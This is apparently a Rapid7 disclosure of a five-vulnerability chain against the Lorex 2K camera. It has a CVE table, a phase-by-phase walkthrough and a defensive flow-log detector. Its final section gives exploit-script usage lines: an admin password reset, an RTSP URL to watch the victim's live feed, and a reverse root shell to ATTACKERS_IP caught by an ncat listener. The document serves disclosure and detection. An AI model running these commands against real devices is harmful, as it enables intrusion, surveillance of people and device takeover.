The Lorex 2K Indoor Wi-Fi Security Camera is a consumer security device that provides cloud-based video camera surveillance capabilities. This device was a target at the 2024 Pwn2Own IoT competition. Rapid7 developed an unauthenticated remote code execution (RCE) exploit chain as an entry for the competition. On November 25, 2024, Lorex released a firmware update to resolve the five vulnerabilities that comprise the exploit chain reported by Rapid7.
The exploit chain consists of five distinct vulnerabilities, which operate together in two phases to achieve unauthenticated RCE. The five vulnerabilities are listed below.
| CVE | Description | Affected Component | CVSSv3.1 |
|---|---|---|---|
| CVE-2024-52544 | An unauthenticated attacker can trigger a stack-based buffer overflow. | DP Service (TCP port 3500) | 9.8 (Critical) |
| CVE-2024-52545 | An unauthenticated attacker can perform an out-of-bounds heap read. | IQ Service (TCP port 9876) | 6.5 (Medium) |
| CVE-2024-52546 | An unauthenticated attacker can trigger a null pointer dereference. | DHIP Service (UDP port 37810) | 5.3 (Medium) |
| CVE-2024-52547 | An authenticated attacker can trigger a stack-based buffer overflow. | DHIP Service (TCP port 80) | 7.2 (High) |
| CVE-2024-52548 | An attacker can bypass code signing enforcement and execute arbitrary native code. | Kernel | 6.7 (Medium) |
Phase 1 performs an authentication bypass, allowing a remote unauthenticated attacker to reset the device's admin password to a password of the attacker's choosing. This phase leverages an unauthenticated stack-based buffer overflow and an unauthenticated out-of-bounds (OOB) heap read vulnerability. The OOB heap read allows an attacker to leak secrets stored in the device's memory that are required to compute a special code value; this code value is required before an administrator password reset can be performed. A null pointer dereference vulnerability is then leveraged to force the device to reboot so that the next phase can complete.
Phase 2 achieves remote code execution by leveraging the auth bypass from phase 1 to perform an authenticated stack-based buffer overflow and execute an Operating System (OS) command with root privileges. This capability is then leveraged to write a file to disk and, in turn, bypass the device's code signing enforcement in order to execute arbitrary native code. Finally, the exploit executes a reverse shell payload to give the remote attacker a root shell on the target device.
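For defenders, the chain above has a recognisable network footprint: one source host touches the phase-1 services (TCP 3500, TCP 9876, UDP 37810) and shortly afterwards the authenticated DHIP service on TCP 80. The following is an added example (not part of Rapid7's tooling) that flags that sequence in a constructed flow log; the log format, the hosts and the 600-second window are assumptions.

```python
"""Flag source hosts whose traffic matches the two-phase footprint of the Lorex exploit chain."""
from collections import defaultdict

# Services the chain touches, taken from the vulnerability table above.
PHASE1_SERVICES = {("tcp", 3500), ("tcp", 9876), ("udp", 37810)}  # DP, IQ, DHIP (UDP)
PHASE2_SERVICES = {("tcp", 80)}                                     # authenticated DHIP overflow

# Constructed sample flow log, one record per line: "timestamp src dst proto dport".
# 10.0.0.5 walks the full chain; 10.0.0.7 is an ordinary client using RTSP and the web UI.
SAMPLE_FLOWS = """\
1700000001 10.0.0.5 10.0.0.20 tcp 3500
1700000002 10.0.0.5 10.0.0.20 tcp 9876
1700000003 10.0.0.5 10.0.0.20 udp 37810
1700000090 10.0.0.5 10.0.0.20 tcp 80
1700000095 10.0.0.5 10.0.0.20 tcp 554
1700000010 10.0.0.7 10.0.0.20 tcp 554
1700000011 10.0.0.7 10.0.0.20 tcp 80
"""


def parse_flows(text):
    """Parse the constructed log into (ts, src, dst, proto, dport) tuples, oldest first."""
    flows = []
    for line in text.splitlines():
        ts, src, dst, proto, dport = line.split()
        flows.append((int(ts), src, dst, proto.lower(), int(dport)))
    return sorted(flows)


def find_chain_candidates(flows, window=600):
    """Return {(src, dst): ts} for pairs where one source contacted every phase-1 service
    and then a phase-2 service within `window` seconds of its first phase-1 contact.
    Requiring the phase-1 services first keeps ordinary web-UI (TCP 80) traffic from alerting.
    Note: DHIP discovery is broadcast, so in real logs the UDP 37810 record may carry a
    broadcast destination; this assumed log format records the unicast target."""
    seen = defaultdict(dict)  # (src, dst) -> {(proto, port): first timestamp}
    hits = {}
    for ts, src, dst, proto, dport in flows:
        key, svc = (src, dst), (proto, dport)
        seen[key].setdefault(svc, ts)
        if svc in PHASE2_SERVICES and PHASE1_SERVICES.issubset(seen[key]):
            first_phase1 = min(seen[key][s] for s in PHASE1_SERVICES)
            if ts - first_phase1 <= window and key not in hits:
                hits[key] = ts
    return hits


if __name__ == "__main__":
    for (src, dst), ts in find_chain_candidates(parse_flows(SAMPLE_FLOWS)).items():
        print(f"possible Lorex exploit chain: {src} -> {dst} (phase 2 at {ts})")
```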
A detailed technical analysis for this exploit chain can be found in Rapid7’s whitepaper here.
To discover a device on the network, the LOREX_DISCOVER.rb script can be used. No additional parameters are required, as discovery is performed over broadcast UDP.

```
ruby LOREX_DISCOVER.rb
```

Once the IP address of a target device has been identified, the auth bypass can be performed via the LOREX_AUTHBYPASS.rb script.

```
ruby LOREX_AUTHBYPASS.rb -t TARGET_IP -p Rapid7!!
```

After the auth bypass has succeeded, you can view the live video and audio stream of the target device by opening the URL below in a suitable video player such as VLC.

```
rtsp://admin:Rapid7!!@TARGET_IP:554/cam/realmonitor?channel=1&subtype=0
```

Finally, a reverse root shell can be achieved via the LOREX_RCE.rb script. An IP address and port for the reverse shell to call back to must be supplied.

```
ruby LOREX_RCE.rb -t TARGET_IP -p Rapid7!! --lhost ATTACKERS_IP --lport 4444
```

Running an Ncat listener on the attacker's machine will catch the reverse shell (don't forget to open the listening port in your firewall rules).

```
ncat -lnvkp 4444
```
These vulnerabilities were discovered by Stephen Fewer, Principal Security Researcher at Rapid7 and were disclosed in accordance with Rapid7’s vulnerability disclosure policy.